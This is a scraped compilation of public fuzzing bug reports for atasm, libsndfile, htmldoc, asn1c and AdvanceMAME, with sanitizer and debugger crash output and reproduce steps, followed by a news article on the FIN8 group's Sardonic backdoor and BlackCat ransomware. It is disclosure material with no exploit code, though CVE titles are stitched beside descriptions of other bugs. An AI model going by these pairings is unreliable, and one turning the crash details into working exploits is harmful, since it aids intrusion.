      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1701892==ABORTING

CVE-2021-34119: Heap-buffer-overflow in function parse_paragraph() in ps-pdf.cxx · Issue #431 · michaelrsweet/htmldoc

An issue was discovered on atasm, version 1.09. A stack-buffer-overflow vulnerability in function aprintf() in asm.c allows attackers to execute arbitrary code on the system via a crafted file.

*   Summary
*   Files
*   Reviews
*   Support
*   Tickets ▾
    *   Bugs
    *   Feature Requests
*   News
*   Code
*   Discussion

Menu ▾ ▴

**#23 stack-buffer-overflow in function aprintf()**

Status: open

Owner: nobody

Labels: None

Priority: 5

Updated: 2021-05-10

Created: 2021-04-06

Private: No

Hi,

While fuzzing ATasm 1.09, I found **stack-buffer-overflow** in function aprintf() in asm.c

strcat(line,buf); will result in stack overflow

\=================================================================
\==3256651\==ERROR: AddressSanitizer: stack\-buffer\-overflow on address 0x7ffcaad2ff90 at pc 0x7f24f095b715 bp 0x7ffcaad2fe00 sp 0x7ffcaad2f590
WRITE of size 271 at 0x7ffcaad2ff90 thread T0
    #0 0x7f24f095b714 in vsprintf (/usr/lib/x86\_64\-linux\-gnu/libasan.so.5+0x9e714)
    #1 0x56362c585de7 in aprintf /home/atasm/src\-afl\-gcc/asm.c:330
    #2 0x56362c593603 in do\_xword /home/atasm/src\-afl\-gcc/asm.c:1312
    #3 0x56362c59d6d3 in proc\_sym /home/atasm/src\-afl\-gcc/asm.c:1586
    #4 0x56362c5a1f4a in do\_cmd /home/atasm/src\-afl\-gcc/asm.c:1995
    #5 0x56362c5a2424 in assemble /home/atasm/src\-afl\-gcc/asm.c:2034
    #6 0x56362c580341 in main /home/atasm/src\-afl\-gcc/asm.c:2446
    #7 0x7f24f06d60b2 in \_\_libc\_start\_main (/lib/x86\_64\-linux\-gnu/libc.so.6+0x270b2)
    #8 0x56362c581ddd in \_start (/home/atasm/src\-afl\-gcc/atasm+0xdddd)

Address 0x7ffcaad2ff90 is located in stack of thread T0 at offset 352 in frame
    #0 0x56362c585b7f in aprintf /home/atasm/src\-afl\-gcc/asm.c:322

  This frame has 4 object(s):
    \[32, 56) 'args' (line 326)
    \[96, 352) 'buf' (line 323)
    \[416, 672) 'line' (line 323) <== Memory access at offset 352 partially underflows this variable
    \[736, 992) 'buf' (line 1114)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions \*are\* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86\_64-linux-gnu/libasan.so.5+0x9e714) in vsprintf
Shadow bytes around the buggy address:
  0x10001559dfa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001559dfb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001559dfc0: 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f2 f2 f2
  0x10001559dfd0: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001559dfe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x10001559dff0: 00 00\[f2\]f2 f2 f2 f2 f2 f2 f2 00 00 00 00 00 00
  0x10001559e000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001559e010: 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2
  0x10001559e020: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001559e030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10001559e040: 00 00 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==3256651\==ABORTING

reproduce:

atasm stack\_buffer\_over\_03\_aprintf

**1 Attachments**

**Discussion**

Log in to post a comment.

CVE-2021-34123: ATasm: 6502 cross-assembler / Bugs

Multiple signed integers overflow in function au_read_header in src/au.c and in functions mat4_open and mat4_read_header in src/mat4.c in Libsndfile, allows an attacker to cause Denial of Service or other unspecified impacts.

****Describe the bug****

UndefinedBehaviorSanitizer: multiple signed integers overflow in the codebase. I attach different testcases that trigger different overflows.

****To Reproduce****

Built libsndfile using clang-10 according to the oss-fuzz script with CXXFLAGS='-O1 -fsanitize=address -fsanitize=array-bounds,bool,builtin,enum,float-divide-by-zero,function,integer-divide-by-zero,null,object-size,return,returns-nonnull-attribute,shift,signed-integer-overflow,unreachable,vla-bound,vptr'

commit: 4b01368

****Example UBSAN Output****

    $ ./sndfile_alt_fuzzer id:000006,sig:06,src:001126,time:22443,op:havoc,rep:4,trial:0
    INFO: Seed: 3120870912
    INFO: Loaded 1 modules   (33759 inline 8-bit counters): 33759 [0x8977c3, 0x89fba2), 
    INFO: Loaded 1 PC tables (33759 PCs): 33759 [0x6f6b48,0x77a938), 
    sndfile_alt_fuzzer: Running 1 inputs 1 time(s) each.
    Running: id:000006,sig:06,src:001126,time:22443,op:havoc,rep:4,trial:0
    src/au.c:324:54: runtime error: signed integer overflow: 1684960000 + 779316836 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/au.c:324:54 in 
    src/au.c:326:29: runtime error: signed integer overflow: 1684960000 + 779316836 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/au.c:326:29 in 
    src/au.c:327:40: runtime error: signed integer overflow: 1684960000 + 779316836 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/au.c:327:40 in 
    Executed id:000006,sig:06,src:001126,time:22443,op:havoc,rep:4,trial:0 in 1 ms
    ***
    *** NOTE: fuzzing was not performed, you have only
    ***       executed the target code on a fixed set of inputs.
    ***
    
    or for example
    
    $ ./sndfile_alt_fuzzer id:000011,sig:06,src:001848,time:296603,op:havoc,rep:4,trial:4
    INFO: Seed: 3162641945
    INFO: Loaded 1 modules   (33759 inline 8-bit counters): 33759 [0x8977c3, 0x89fba2), 
    INFO: Loaded 1 PC tables (33759 PCs): 33759 [0x6f6b48,0x77a938), 
    sndfile_alt_fuzzer: Running 1 inputs 1 time(s) each.
    Running: id:000011,sig:06,src:001848,time:296603,op:havoc,rep:4,trial:4
    src/mat4.c:323:41: runtime error: signed integer overflow: -587202559 * 553648128 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:41 in 
    src/mat4.c:323:48: runtime error: signed integer overflow: 553648128 * 8 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:323:48 in 
    src/mat4.c:107:35: runtime error: signed integer overflow: 8 * -587202559 cannot be represented in type 'int'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/mat4.c:107:35 in 
    Executed id:000011,sig:06,src:001848,time:296603,op:havoc,rep:4,trial:4 in 1 ms
    

testcases:  
int overflow.zip

CVE-2022-33065: UndefinedBehaviorSanitizer: multiple signed integer overflow · Issue #833 · libsndfile/libsndfile

An Out of Bounds flaw was discovered in htmodoc 1.9.12 in function parse_tree() in toc.cxx, this possibly leads to memory layout information leaking in the data. This might be used in a chain of vulnerability in order to reach code execution.

Hi ,

In function parse\_tree() in toc.cxx, there is a out-of-bounds read bug.

If the value of heading_numbers[i] equal to 1000, then the heading_numbers[i] / 100 = 10 , but the length of array HUNDREDS and hundreds is 10, so out of bounds read occurred.

    232               case 'i' :
    233                   snprintf((char *)headptr, sizeof(heading) - (size_t)(headptr - heading), "%s%s%s", hundreds[heading_numbers[i] / 100],     tens[(heading_numbers[i] / 10) % 10], ones[heading_numbers[i] % 10]);
    234                   break;
    235               case 'I' :
    236                   snprintf((char *)headptr, sizeof(heading) - (size_t)(headptr - heading), "%s%s%s", HUNDREDS[heading_numbers[i] / 100],     TENS[(heading_numbers[i] / 10) % 10], ONES[heading_numbers[i] % 10]);
    237                   break;
    

**Version:**  
1.9.12 commit \[a5b87b9\]  
**Env:**  
ubuntu 20.04 x86\_64  
clang version 11.0.0

reproduce  
./configure  
make  
./htmldoc \[poc\]

oobr\_parse\_tree.poc.zip

\*\*more \*\*

gdb

    #3  0x00007ffff7a04f76 in __GI___snprintf (s=<optimized out>, maxlen=<optimized out>, format=<optimized out>) at snprintf.c:31
    #4  0x0000000000462ae9 in parse_tree (t=0xc50620) at toc.cxx:236
    #5  0x0000000000463047 in parse_tree (t=0xc500a0) at toc.cxx:375
    #6  0x0000000000463047 in parse_tree (t=0x99c9b0) at toc.cxx:375
    #7  0x0000000000463047 in parse_tree (t=0x968080) at toc.cxx:375
    #8  0x0000000000463047 in parse_tree (t=0x967900) at toc.cxx:375
    #9  0x0000000000463047 in parse_tree (t=0x9401c0) at toc.cxx:375
    #10 0x0000000000462439 in toc_build (tree=0x9401c0) at toc.cxx:81
    #11 0x000000000040cfa7 in main (argc=0x2, argv=0x7fffffffe368) at htmldoc.cxx:1275
    
    gef➤   p heading_numbers[i] / 100
    $24 = 0xa
    gef➤  p HUNDREDS[heading_numbers[i] / 100]
    $25 = 0x3131313131313149 <error: Cannot access memory at address 0x3131313131313149>
    
    
    

    ==311711== Invalid read of size 1
    ==311711==    at 0x483EF46: strlen (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==311711==    by 0x4CFCE94: __vfprintf_internal (vfprintf-internal.c:1688)
    ==311711==    by 0x4D10119: __vsnprintf_internal (vsnprintf.c:114)
    ==311711==    by 0x4CE5F75: snprintf (snprintf.c:31)
    ==311711==    by 0x462AE8: parse_tree(tree_str*) (toc.cxx:236)
    ==311711==    by 0x463046: parse_tree(tree_str*) (toc.cxx:375)
    ==311711==    by 0x463046: parse_tree(tree_str*) (toc.cxx:375)
    ==311711==    by 0x463046: parse_tree(tree_str*) (toc.cxx:375)
    ==311711==    by 0x463046: parse_tree(tree_str*) (toc.cxx:375)
    ==311711==    by 0x463046: parse_tree(tree_str*) (toc.cxx:375)
    ==311711==    by 0x462438: toc_build (toc.cxx:81)
    ==311711==    by 0x40CFA6: main (htmldoc.cxx:1275)
    ==311711==  Address 0x3131313131313149 is not stack'd, malloc'd or (recently) free'd

CVE-2021-34121: Out of bounds read in function  · Issue #433 · michaelrsweet/htmldoc

An off-by-one error in function wav_read_header in src/wav.c in Libsndfile 1.1.0, results in a write out of bound, which allows an attacker to execute arbitrary code, Denial of Service or other unspecified impacts.

****Describe the bug****

UndefinedBehaviorSanitizer: index 100 out of bounds for type 'SF\_CUE\_POINT \[100\]' in wav.c:524

****To Reproduce****

Built libsndfile using clang-10 according to the oss-fuzz script with CXXFLAGS='-O1 -fsanitize=address -fsanitize=array-bounds,bool,builtin,enum,float-divide-by-zero,function,integer-divide-by-zero,null,object-size,return,returns-nonnull-attribute,shift,signed-integer-overflow,unreachable,vla-bound,vptr'

commit: 4b01368

****UBSAN Output****

    $ ./sndfile_alt_fuzzer id:000051,sig:06,src:002454+003908,time:5669051,op:splice,rep:8,trial:2
    INFO: Seed: 3446105526
    INFO: Loaded 1 modules   (33759 inline 8-bit counters): 33759 [0x8977c3, 0x89fba2), 
    INFO: Loaded 1 PC tables (33759 PCs): 33759 [0x6f6b48,0x77a938), 
    sndfile_alt_fuzzer: Running 1 inputs 1 time(s) each.
    Running: id:000051,sig:06,src:002454+003908,time:5669051,op:splice,rep:8,trial:2
    src/wav.c:524:8: runtime error: index 100 out of bounds for type 'SF_CUE_POINT [100]'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/wav.c:524:8 in 
    src/wav.c:525:8: runtime error: index 100 out of bounds for type 'SF_CUE_POINT [100]'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/wav.c:525:8 in 
    src/wav.c:526:8: runtime error: index 100 out of bounds for type 'SF_CUE_POINT [100]'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/wav.c:526:8 in 
    src/wav.c:527:8: runtime error: index 100 out of bounds for type 'SF_CUE_POINT [100]'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/wav.c:527:8 in 
    src/wav.c:528:8: runtime error: index 100 out of bounds for type 'SF_CUE_POINT [100]'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/wav.c:528:8 in 
    src/wav.c:529:8: runtime error: index 100 out of bounds for type 'SF_CUE_POINT [100]'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/wav.c:529:8 in 
    src/wav.c:530:8: runtime error: index 100 out of bounds for type 'SF_CUE_POINT [100]'
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior src/wav.c:530:8 in 
    Executed id:000051,sig:06,src:002454+003908,time:5669051,op:splice,rep:8,trial:2 in 2 ms
    

testcase:  
idx out of bound.zip

CVE-2022-33064: UndefinedBehaviorSanitizer: index 100 out of bounds for type 'SF_CUE_POINT [100]' · Issue #832 · libsndfile/libsndfile

Stack-based buffer overflow vulnerability in asn1c through v0.9.28 via function genhash_get in genhash.c.

CVE-2020-23910: A stack overflow in genhash.c:506:7 causes Segmentation fault · Issue #396 · vlm/asn1c

Heap-based buffer over-read in function png_convert_4 in file pngex.cc in AdvanceMAME through 2.1.

*   Summary
*   Files
*   Reviews
*   Support
*   Mailing Lists
*   Tickets ▾
    *   Patches
    *   Feature Requests
    *   Bugs
*   Discussion
*   Donate
*   Git ▾
    *   advancecd
    *   makebootfat

Menu ▾ ▴

Status: open

Owner: nobody

Priority: 5

Updated: 2020-08-06

Created: 2020-08-06

Private: No

**System info**

Ubuntu x86\_64, clang 6.0, advmng (latest master fcf71a)

**Command line**

./advmng -c -q -e -r -x @@

**AddressSanitizer output**

\=================================================================
\==46247\==ERROR: AddressSanitizer: heap\-buffer\-overflow on address 0x602000000075 at pc 0x0000004dff5d bp 0x7ffd0b37a770 sp 0x7ffd0b379f20
READ of size 260 at 0x602000000075 thread T0
    #0 0x4dff5c in \_\_asan\_memcpy /home/seviezhou/llvm\-6.0.0/projects/compiler\-rt/lib/asan/asan\_interceptors\_memintrinsics.cc:23
    #1 0x543a90 in png\_convert\_4(unsigned int, unsigned int, unsigned int, unsigned char\*, unsigned int, unsigned char\*, unsigned int, unsigned char\*\*, unsigned int\*, unsigned int\*) /home/seviezhou/advancecomp/pngex.cc:433:4
    #2 0x52a28f in extract(std::\_\_cxx11::basic\_string<char, std::char\_traits<char\>, std::allocator<char\> \> const&) /home/seviezhou/advancecomp/remng.cc:766:4
    #3 0x53208b in extract\_all(int, char\*\*) /home/seviezhou/advancecomp/remng.cc:1011:3
    #4 0x5356f4 in process(int, char\*\*) /home/seviezhou/advancecomp/remng.cc:1255:3
    #5 0x537887 in main /home/seviezhou/advancecomp/remng.cc:1268:3
    #6 0x7f7d77b5e83f in \_\_libc\_start\_main /build/glibc\-e6zv40/glibc\-2.23/csu/../csu/libc\-start.c:291
    #7 0x41cec8 in \_start (/home/seviezhou/advancecomp/advmng+0x41cec8)

0x602000000075 is located 0 bytes to the right of 5\-byte region \[0x602000000070,0x602000000075)
allocated by thread T0 here:
    #0 0x4e10d8 in \_\_interceptor\_malloc /home/seviezhou/llvm\-6.0.0/projects/compiler\-rt/lib/asan/asan\_malloc\_linux.cc:88
    #1 0x5715be in mng\_read\_ihdr /home/seviezhou/advancecomp/lib/mng.c:139:18
    #2 0x5715be in mng\_read /home/seviezhou/advancecomp/lib/mng.c:650
    #3 0x56dfa2 in adv\_mng\_read /home/seviezhou/advancecomp/lib/mng.c:748:9
    #4 0x53208b in extract\_all(int, char\*\*) /home/seviezhou/advancecomp/remng.cc:1011:3
    #5 0x5356f4 in process(int, char\*\*) /home/seviezhou/advancecomp/remng.cc:1255:3
    #6 0x537887 in main /home/seviezhou/advancecomp/remng.cc:1268:3
    #7 0x7f7d77b5e83f in \_\_libc\_start\_main /build/glibc\-e6zv40/glibc\-2.23/csu/../csu/libc\-start.c:291

SUMMARY: AddressSanitizer: heap\-buffer\-overflow /home/seviezhou/llvm\-6.0.0/projects/compiler\-rt/lib/asan/asan\_interceptors\_memintrinsics.cc:23 in \_\_asan\_memcpy
Shadow bytes around the buggy address:
  0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c047fff8000: fa fa fd fa fa fa fd fa fa fa fd fd fa fa\[05\]fa
  0x0c047fff8010: fa fa fd fd fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==46247\==ABORTING

**1 Attachments**

**Discussion**

Log in to post a comment.

CVE-2020-23909: AdvanceMAME / Bugs / #285 A heap overflow in pngex.cc:433:4

The financially motivated threat actor known as FIN8 has been observed using a "revamped" version of a backdoor called Sardonic to deliver the BlackCat ransomware.
According to the Symantec Threat Hunter Team, part of Broadcom, the development is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. The intrusion attempt took place in

Ransomware / Cyber Threat

The financially motivated threat actor known as FIN8 has been observed using a "revamped" version of a backdoor called **Sardonic** to deliver the BlackCat ransomware.

According to the Symantec Threat Hunter Team, part of Broadcom, the development is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. The intrusion attempt took place in December 2022.

FIN8 is being tracked by the cybersecurity company under the name Syssphinx. Known to be active since at least 2016, the adversary was originally attributed to attacks targeting point-of-sale (PoS) systems using malware such as PUNCHTRACK and BADHATCH.

The group resurfaced after more than a year in March 2021 with an updated version of BADHATCH, following it up with a completely new implant called Sardonic, which was disclosed by Bitdefender in August 2021.

"The C++-based Sardonic backdoor has the ability to harvest system information and execute commands, and has a plugin system designed to load and execute additional malware payloads delivered as DLLs," Symantec said in a report shared with The Hacker News.

Unlike the previous variant, which was designed in C++, the latest iteration packs in significant alterations, with most of the source code rewritten in C and modified so as to deliberately avoid similarities.

In the incident analyzed by Symantec, Sardonic is embedded into a PowerShell script that was deployed into the targeted system after obtaining initial access. The script is designed to launch a .NET loader, which then decrypts and executes an injector module to ultimately run the implant.

"The purpose of the injector is to start the backdoor in a newly created WmiPrvSE.exe process," Symantec explained. "When creating the WmiPrvSE.exe process, the injector attempts to start it in session-0 (best effort) using a token stolen from the lsass.exe process."

Sardonic, besides supporting up to 10 interactive sessions on the infected host for the threat actor to run malicious commands, supports three different plugin formats to execute additional DLL and shellcode.

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

Some of the other features of the backdoor include the ability to drop arbitrary files and exfiltrate file contents from the compromised machine to an actor-controlled infrastructure.

This is not the first time FIN8 has been detected using Sardonic in connection with a ransomware attack. In January 2022, Lodestone and Trend Micro uncovered FIN8's use of the White Rabbit ransomware, which, in itself, is based on Sardonic.

"Syssphinx continues to develop and improve its capabilities and malware delivery infrastructure, periodically refining its tools and tactics to avoid detection," Symantec said.

"The group's decision to expand from point-of-sale attacks to the deployment of ransomware demonstrates the threat actors' dedication to maximizing profits from victim organizations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#c++